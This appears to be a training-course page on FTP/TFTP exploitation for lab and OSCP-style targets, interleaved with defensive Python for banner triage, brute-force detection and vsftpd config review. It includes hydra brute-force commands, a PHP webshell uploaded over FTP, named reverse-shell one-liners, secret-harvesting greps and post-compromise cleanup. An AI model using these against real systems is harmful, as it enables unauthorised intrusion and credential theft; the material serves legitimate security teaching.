FTP Exploitation Mastery
Six modules. Anonymous enumeration to shell delivery. From reading a TFTP config file to chaining FTP, SMB, and Rsync into a root compromise — every technique practised against live running machines, not screenshots.
The FTP Attack Methodology
The four-phase workflow for every FTP target — from first contact to shell delivery.
Phase 1 — Service Discovery
FTP runs on 21/tcp by default. TFTP on 69/udp.
TFTP is invisible to a TCP-only nmap scan, so run a UDP scan alongside the TCP one,
and use the default scripts to fingerprint the service version and check for anonymous access in one pass.
nmap -sC -sV -p 21,22 TARGET # TCP FTP + SSH
nmap -sU -p 69 TARGET # TFTP (UDP only)
nmap -p 21 --script=ftp-anon TARGET # anonymous check
nmap -p 21 --script=ftp-syst TARGET # OS from SYST cmd
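To turn a batch of 220 greetings into a patch list rather than a target list, here is an added example (not part of the course material) that parses FTP banners and flags the two versions the course names as carrying public CVEs. The greeting patterns, the sample banners and the status labels are assumptions; real daemons frequently trim or replace their banner, which the "version-hidden" outcome records instead of guessing a version.

```python
import re

# Versions the course text singles out as carrying well-known public issues,
# keyed by (product as it appears in the banner, lowercased; version string).
KNOWN_ISSUES = {
    ("vsftpd", "2.3.4"): "CVE-2011-2523",
    ("proftpd", "1.3.5"): "CVE-2015-3306",
}

# Greeting shapes for common daemons. These are assumptions drawn from typical
# default banners; admins often override them (ftpd_banner, ServerIdent),
# which is exactly the "version-hidden" case handled below.
BANNER_PATTERNS = [
    re.compile(r"^220[ -]\(?(?P<product>vsFTPd) (?P<version>[\w.]+)\)?", re.I),
    re.compile(r"^220[ -](?P<product>ProFTPD) (?P<version>[\w.]+)", re.I),
    re.compile(r"^220[ -].*?(?P<product>Pure-FTPd)", re.I),
    re.compile(r"^220[ -](?P<product>Microsoft FTP Service)", re.I),
]


def parse_banner(line):
    """Return (product, version) from a 220 greeting. version is None when the
    daemon names itself but hides its version; both are None for a custom
    greeting or for a line that is not a 220 reply at all."""
    line = line.strip()
    if not line.startswith("220"):
        return None, None
    for pat in BANNER_PATTERNS:
        m = pat.match(line)
        if m:
            return m.group("product"), m.groupdict().get("version")
    return None, None


def assess(line):
    """Classify one greeting for a patch/inventory report."""
    product, version = parse_banner(line)
    result = {"banner": line.strip(), "product": product, "version": version}
    if product is None:
        result["status"] = "unrecognised"       # custom banner: fingerprint by other means
    elif version is None:
        result["status"] = "version-hidden"     # banner trimmed: nmap -sV or package query needed
    elif (product.lower(), version) in KNOWN_ISSUES:
        result["status"] = "known-issue"
        result["ref"] = KNOWN_ISSUES[(product.lower(), version)]
    else:
        result["status"] = "check-advisories"   # version visible: compare against current advisories
    return result


def inventory(banners):
    """Summarise many greetings (one per host) into counts per status."""
    counts = {}
    for b in banners:
        status = assess(b)["status"]
        counts[status] = counts.get(status, 0) + 1
    return counts


# Constructed sample greetings (not captured from any real host).
SAMPLE_BANNERS = [
    "220 (vsFTPd 2.3.4)",
    "220 (vsFTPd 3.0.3)",
    "220 ProFTPD 1.3.5 Server (Debian) [::ffff:10.0.0.5]",
    "220 ---------- Welcome to Pure-FTPd [privsep] [TLS] ----------",
    "220 Microsoft FTP Service",
    "220 FTP server ready.",
]

if __name__ == "__main__":
    for b in SAMPLE_BANNERS:
        r = assess(b)
        print(f"{r['status']:<17} {r.get('ref', ''):<14} {b}")
    print(inventory(SAMPLE_BANNERS))
```

Feed it the first line returned by `nc -nv HOST 21` for each host in your estate; the "version-hidden" bucket is where `nmap -sV` earns its keep, and the "known-issue" bucket is the one to fix before anyone else reads the same banner.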
Phase 2 — Enumeration
Always try anonymous before touching a password. If anonymous works, mirror everything — you cannot enumerate what you haven't downloaded. When anonymous fails, correlate the banner version against CVE databases before brute-forcing.
# Manual anonymous login
ftp TARGET
Name: anonymous
Password: <press Enter>
ftp> ls -la
ftp> mget *
# Recursive download with lftp
lftp -u anonymous, ftp://TARGET
lftp> mirror . /tmp/loot/
Phase 3 — Exploitation
Three primary exploit vectors: (1) known CVE from banner version, (2) credential brute-force, (3) writable FTP directory mapped to web root. On most CTF/OSCP targets the answer is one of these three. Credential reuse is the most overlooked — try every FTP password on SSH.
# Version-based CVE check
searchsploit vsftpd 2.3.4
searchsploit proftpd 1.3.5
# Credential brute-force
hydra -l ftpuser -P /usr/share/wordlists/rockyou.txt \
ftp://TARGET -t 4
# FTP write → webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
ftp> put shell.php
Phase 4 — Pivoting
FTP is rarely the final destination — it's a step in a chain. Data from FTP feeds into SSH, web access, or SMB. A credential found in an FTP config file might open a database. A file uploaded over FTP might execute as root via cron. Always ask: where else does this data or access lead?
# After FTP download — triage for credentials
grep -rEi 'pass|password|secret|key|token|cred' /tmp/loot/
find /tmp/loot -name "*.conf" -o -name "*.ini" \
-o -name "*.xml" -o -name "id_rsa*"
# Test FTP creds on SSH
ssh ftpuser@TARGET
The Six Modules
Complete them in order. Each module has structured hands-on assignments — finish all tasks before moving to the next.
FTP Fundamentals & Anonymous Access
The first question on any FTP target: does it allow anonymous login? Master the FTP command set, active vs passive mode, and anonymous enumeration. TFTP rounds out the module with the most permissive file protocol ever standardised — no authentication, no directory listing, just raw access.
- FTP PORT (active) vs PASV (passive) — firewall behaviour and when each fails
- Anonymous FTP login: username anonymous, password <any email>
- Core FTP commands: LIST, NLST, GET, PUT, MGET, MPUT, binary/ascii mode
- lftp -e 'mirror . /tmp/loot' for recursive anonymous downloads
- nmap --script=ftp-anon and ftp-bounce for automated anonymous check
- TFTP vs FTP: UDP/69, no auth, no directory listing, filename guessing required
- Triage: grep -r 'pass\|key\|cred\|token' loot/ after bulk download
Hands-on assignments for this module are available to Premium members.
Banner Grabbing & Version Exploitation
The FTP banner is the first thing a server tells you — and it's often a security researcher's dream. Version numbers correlate directly to CVE databases. vsftpd 2.3.4's backdoor is the most famous example: a smiley face in the username triggers a root shell on port 6200.
- Manual banner grab: nc -nv TARGET 21 / telnet TARGET 21
- nmap -sV --version-intensity 9 for deep FTP service fingerprinting
- searchsploit vsftpd / proftpd / pure-ftpd / wuftpd for version-based CVEs
- vsftpd 2.3.4 backdoor (CVE-2011-2523): USERNAME:) triggers bind shell on 6200/tcp
- ProFTPd mod_copy (CVE-2015-3306): SITE CPFR / SITE CPTO for unauthenticated file copy
- Banner fingerprinting: OS hints, compile-time paths, software version strings
- Exploit evaluation: reliability, detection profile, version certainty requirement
Hands-on assignments for this module are available to Premium members.
FTP Credential Attacks
When anonymous fails, credential attacks begin. FTP has no built-in rate limiting in most implementations — making it one of the cleanest brute-force surfaces. Learn to build tight, targeted wordlists and run attacks efficiently while avoiding lockouts.
- hydra -l USERNAME -P rockyou.txt ftp://TARGET — single-user brute-force
- hydra -L users.txt -P passwords.txt ftp://TARGET -t 4 — multi-user spray
- medusa -h TARGET -U users.txt -P passwords.txt -M ftp -t 2
- ncrack -p 21 --user ftpuser -P passwords.txt TARGET
- cewl http://TARGET/ — scrape website to build context-specific wordlist
- Password spray vs full brute-force: rate, detection, account lockout logic
- Credential reuse: FTP passwords often appear on SSH, SMB, and web panels
Hands-on assignments for this module are available to Premium members.
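The flip side of "no built-in rate limiting" is that the burst is obvious in the server's own log. The following detection logic is an added example, not part of the course: it runs a per-source sliding window over vsftpd.log login lines and also raises on anonymous logins and on a success that follows a flagged burst, which is the event that matters most. The log line format, the threshold and the sample lines are assumptions constructed for the demo.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Login lines as vsftpd writes them to its own log (vsftpd.log), e.g.
#   Sun Mar 10 12:00:03 2024 [pid 2] [ftpuser] FAIL LOGIN: Client "203.0.113.7"
# The format is an assumption based on vsftpd's default logging; xferlog-style
# output looks different and would need another pattern.
LOGIN_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) '
    r'\[pid \d+\] \[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: '
    r'Client "(?P<ip>[^"]+)"'
)


def parse_login(line):
    """Return {'ts', 'user', 'ok', 'ip'} for a login line, else None."""
    m = LOGIN_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(" ".join(m.group("ts").split()), "%a %b %d %H:%M:%S %Y")
    return {"ts": ts, "user": m.group("user"), "ok": m.group("result") == "OK", "ip": m.group("ip")}


def detect(lines, threshold=10, window_s=60):
    """Sliding-window failure counter per source IP, plus two follow-on rules:
    a successful login from an IP already flagged, and any anonymous login."""
    alerts = []
    fails = defaultdict(deque)   # ip -> timestamps of failures inside the window
    users = defaultdict(set)     # ip -> usernames attempted (spray vs single-user)
    flagged = set()
    for line in lines:
        ev = parse_login(line)
        if ev is None:
            continue
        ip, ts = ev["ip"], ev["ts"]
        if ev["ok"]:
            if ev["user"].lower() in ("anonymous", "ftp"):
                alerts.append({"kind": "anonymous_login", "ip": ip, "at": ts})
            elif ip in flagged:
                alerts.append({"kind": "success_after_bruteforce", "ip": ip,
                               "user": ev["user"], "at": ts})
            continue
        q = fails[ip]
        q.append(ts)
        users[ip].add(ev["user"])
        while q and (ts - q[0]).total_seconds() > window_s:   # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged.add(ip)
            alerts.append({"kind": "bruteforce", "ip": ip, "failures": len(q),
                           "window_s": window_s, "users": sorted(users[ip]), "at": ts})
    return alerts


# Constructed sample log: a 12-attempt burst against one account, the eventual
# success from the same source, an anonymous login and a user's ordinary typo.
SAMPLE_LOG = [
    f'Sun Mar 10 12:00:{s:02d} 2024 [pid 2] [ftpuser] FAIL LOGIN: Client "203.0.113.7"'
    for s in range(0, 36, 3)
] + [
    'Sun Mar 10 12:00:40 2024 [pid 2] [ftpuser] OK LOGIN: Client "203.0.113.7"',
    'Sun Mar 10 12:05:12 2024 [pid 2] [anonymous] OK LOGIN: Client "198.51.100.9", anon password "user@example.com"',
    'Sun Mar 10 12:07:03 2024 [pid 2] [alice] FAIL LOGIN: Client "192.0.2.20"',
    'Sun Mar 10 12:07:09 2024 [pid 2] [alice] OK LOGIN: Client "192.0.2.20"',
]

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a)
```

The `users` set distinguishes a single-account brute-force (one username, many passwords) from a spray (many usernames); a threshold of ten failures in a minute is well above any human typing rate, and the success-after-burst rule is the one to page on.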
TFTP: The No-Auth File Protocol
TFTP is the forgotten attack surface. UDP port 69, zero authentication, no directory listing. Network devices, PXE boot servers, and embedded systems expose critical configurations through it. If you know the filename, you own the file — and nmap's tftp-enum script knows a lot of filenames.
- nmap -sU -p 69 --script tftp-enum for automated filename brute-force
- tftp client workflow: connect → get FILENAME → quit → read
- High-value TFTP targets: backup.conf, running-config, passwd, shadow, id_rsa
- PXE boot abuse: unattend.xml and kickstart.cfg carry plaintext admin credentials
- SecLists/Discovery/TFTP/tftp.txt as enumeration wordlist
- Metasploit auxiliary/scanner/tftp/tftpbrute for automated guessing
- TFTP PUT: test server writability — upload a canary file, check if it persists
Hands-on assignments for this module are available to Premium members.
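Why "if you know the filename, you own the file": the following is an added example (not from the course) that encodes and decodes the five RFC 1350 packet types and replays a read with both sides' messages in memory. The request carries a filename and a transfer mode and nothing that identifies the requester, so the only check a plain TFTP server can perform is whether the file exists. The in-memory store and its contents are constructed placeholders.

```python
import struct

# RFC 1350 opcodes and the fixed data block size.
RRQ, WRQ, DATA, ACK, ERROR = 1, 2, 3, 4, 5
BLOCK = 512


def encode_rrq(filename, mode="octet"):
    """Read request: opcode, filename, mode. Nothing else: no user, no password."""
    return struct.pack("!H", RRQ) + filename.encode() + b"\0" + mode.encode() + b"\0"


def encode_data(block, payload):
    return struct.pack("!HH", DATA, block) + payload


def encode_ack(block):
    return struct.pack("!HH", ACK, block)


def encode_error(code, message):
    return struct.pack("!HH", ERROR, code) + message.encode() + b"\0"


def decode(pkt):
    """Parse any of the five RFC 1350 packet types into a dict."""
    if len(pkt) < 4:
        raise ValueError("short packet")
    (op,) = struct.unpack("!H", pkt[:2])
    if op in (RRQ, WRQ):
        fields = pkt[2:].split(b"\0")          # filename, mode, trailing empty field
        if len(fields) < 3:
            raise ValueError("malformed request")
        return {"op": op, "filename": fields[0].decode("latin-1"),
                "mode": fields[1].decode("latin-1").lower()}
    (arg,) = struct.unpack("!H", pkt[2:4])
    if op == DATA:
        return {"op": DATA, "block": arg, "data": pkt[4:]}
    if op == ACK:
        return {"op": ACK, "block": arg}
    if op == ERROR:
        return {"op": ERROR, "code": arg, "message": pkt[4:].split(b"\0")[0].decode("latin-1")}
    raise ValueError(f"unknown opcode {op}")


def simulate_rrq(store, filename):
    """Play both sides of a read in memory. Returns (exchange, result): exchange
    is a list of (sender, raw packet); result is the file bytes or the decoded
    ERROR packet."""
    request = encode_rrq(filename)
    exchange = [("client", request)]
    req = decode(request)
    if req["filename"] not in store:          # the only check a bare TFTP server makes
        err = encode_error(1, "File not found")
        exchange.append(("server", err))
        return exchange, decode(err)
    content, received, block, offset = store[req["filename"]], b"", 1, 0
    while True:
        chunk = content[offset:offset + BLOCK]
        exchange.append(("server", encode_data(block, chunk)))
        received += chunk
        exchange.append(("client", encode_ack(block)))   # ACK carries only the block number
        offset += BLOCK
        block += 1
        if len(chunk) < BLOCK:                # a short (or empty) block ends the transfer
            break
    return exchange, received


# Constructed in-memory "server": filenames of the kind the course lists as
# high-value, contents are placeholders. backup.conf is sized to span three blocks.
STORE = {
    "running-config": b"version 15.1\nhostname edge-rtr\n! credentials would follow here\n",
    "backup.conf": b"x" * 1100,
}

if __name__ == "__main__":
    for name in ("running-config", "shadow"):
        exchange, result = simulate_rrq(STORE, name)
        for sender, pkt in exchange:
            print(f"{sender:>6}: {decode(pkt)}")
        print("result:", result)
```

On the wire the request is the same handful of bytes whether it comes from a PXE client or from a filename-guessing scan, which is why the realistic controls are network placement (TFTP reachable only from the boot VLAN), keeping credentials out of the files served, and logging every RRQ.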
FTP Write Access & Shell Delivery
A writable FTP directory that overlaps the web root is a one-step webshell delivery. Upload a PHP file via FTP, curl it over HTTP, execute system commands. This chain is a recurring OSCP exam pattern and appears regularly in real-world assessments.
- Confirming FTP write access: PUT test.txt → LIST to verify persistence
- Correlating FTP chroot with HTTP web root via banner paths and directory structure
- PHP webshell delivery: <?php system($_GET['cmd']); ?> over FTP PUT
- ASP/ASPX alternatives for Windows IIS FTP targets
- Bypassing FTP extension filters: double extension, null byte (legacy), case mangling
- Reverse shell upgrade from webshell: nc -e, bash /dev/tcp, python3 one-liner
- Operational cleanup: removing uploaded artefacts after compromise
Hands-on assignments for this module are available to Premium members.
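The overlap the module describes is visible in configuration before anyone uploads anything. The following is an added example, not from the course: a review of a vsftpd.conf that reports anonymous or unjailed write access and checks whether anon_root or local_root sits inside the web server's document root, with a weak configuration beside a hardened one. The two configurations and the web root path are constructed; the option defaults follow vsftpd.conf(5).

```python
import os

# vsftpd's compiled-in defaults for the options this review reads, per
# vsftpd.conf(5). Distro packages ship a config overriding several of them,
# so a key missing from the file is filled from here.
DEFAULTS = {
    "anonymous_enable": "YES",
    "write_enable": "NO",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
    "chroot_local_user": "NO",
}


def parse_vsftpd_conf(text):
    """key=value lines; '#' comments and blank lines are ignored."""
    conf = dict(DEFAULTS)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip()
    return conf


def is_under(path, root):
    """True when path is root or lies inside it (string-prefix pitfalls avoided)."""
    path, root = os.path.abspath(path), os.path.abspath(root)
    return os.path.commonpath([path, root]) == root


def review(conf_text, web_root):
    """Return a list of (severity, message) findings for one vsftpd config."""
    c = parse_vsftpd_conf(conf_text)

    def yes(key):
        return c.get(key, "NO").upper() == "YES"

    findings = []
    if yes("anonymous_enable"):
        findings.append(("medium", "anonymous login enabled: everything under the anonymous root is world-readable"))
    if yes("anonymous_enable") and yes("write_enable") and (
            yes("anon_upload_enable") or yes("anon_mkdir_write_enable")):
        findings.append(("high", "anonymous users can write: unauthenticated upload into the FTP tree"))
    if yes("write_enable") and not yes("chroot_local_user"):
        findings.append(("medium", "local users can write and are not chrooted to their home"))
    for key in ("anon_root", "local_root"):
        root = c.get(key)
        if not root:
            continue
        if is_under(root, web_root):
            if yes("write_enable"):
                findings.append(("critical", f"{key}={root} is inside web root {web_root} with write enabled: "
                                             "an uploaded script becomes a web-reachable file"))
            else:
                findings.append(("low", f"{key}={root} is inside web root {web_root} (read-only, but listing exposes site files)"))
    return findings


# Constructed configurations: the weak one reproduces the chain the module
# describes; the hardened one keeps write access but jails it away from the web root.
WEAK_CONF = """\
listen=YES
anonymous_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
anon_root=/var/www/html/upload
local_enable=YES
write_enable=YES
"""

HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_local_user=YES
allow_writeable_chroot=NO
local_root=/srv/ftp
"""

WEB_ROOT = "/var/www/html"   # constructed Apache DocumentRoot for the demo

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {name} ==")
        for severity, message in review(text, WEB_ROOT) or [("ok", "no findings")]:
            print(f"[{severity}] {message}")
```

Run it against the real vsftpd.conf and the DocumentRoot from the web server's configuration; the same check belongs in configuration management so a later edit cannot quietly move an FTP root back under the web tree.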
Protocol Chaining: FTP + SMB + Rsync
File protocols rarely stand alone. Real targets run FTP alongside SMB and rsync — each service storing different data, each requiring different tools. The key is correlation: one protocol gives you a username, another gives the password, a third gives you a private key. Master the full sweep.
- Parallel enumeration: FTP + SMB + rsync in a single triage pass
- SMB null session: smbclient -L //TARGET -N, enum4linux -a, crackmapexec
- Rsync module listing: rsync rsync://TARGET/ → mirror with rsync -av
- Cross-protocol credential correlation: same password across FTP / SSH / SMB
- Split-credential discovery: username in one protocol, password fragment in another
- Attack documentation: source artifact → credential → validated access chain
- Tool sequence: nmap → smbclient → ftp → rsync → ssh in one methodical flow
Hands-on assignments for this module are available to Premium members.
FTP Quick Reference
Commands you will run on every FTP-bearing target.
Discovery One-Liner
nmap -sS -sU -sV -p T:21,22,U:69 \
--script default,ftp-anon,ftp-syst,tftp-enum \
TARGET # -sU needs root; T:/U: split the TCP and UDP port lists
Anonymous Bulk Download
lftp -u anonymous, ftp://TARGET
lftp> mirror . /tmp/loot/
lftp> quit
grep -rEi 'pass|key|cred' /tmp/loot/
TFTP Filename Enum
nmap -sU -p 69 --script tftp-enum \
--script-args tftp-enum.filelist=/usr/share/seclists/Discovery/TFTP/tftp.txt \
TARGET
Brute-Force
hydra -l ftpuser \
-P /usr/share/wordlists/rockyou.txt \
ftp://TARGET -t 4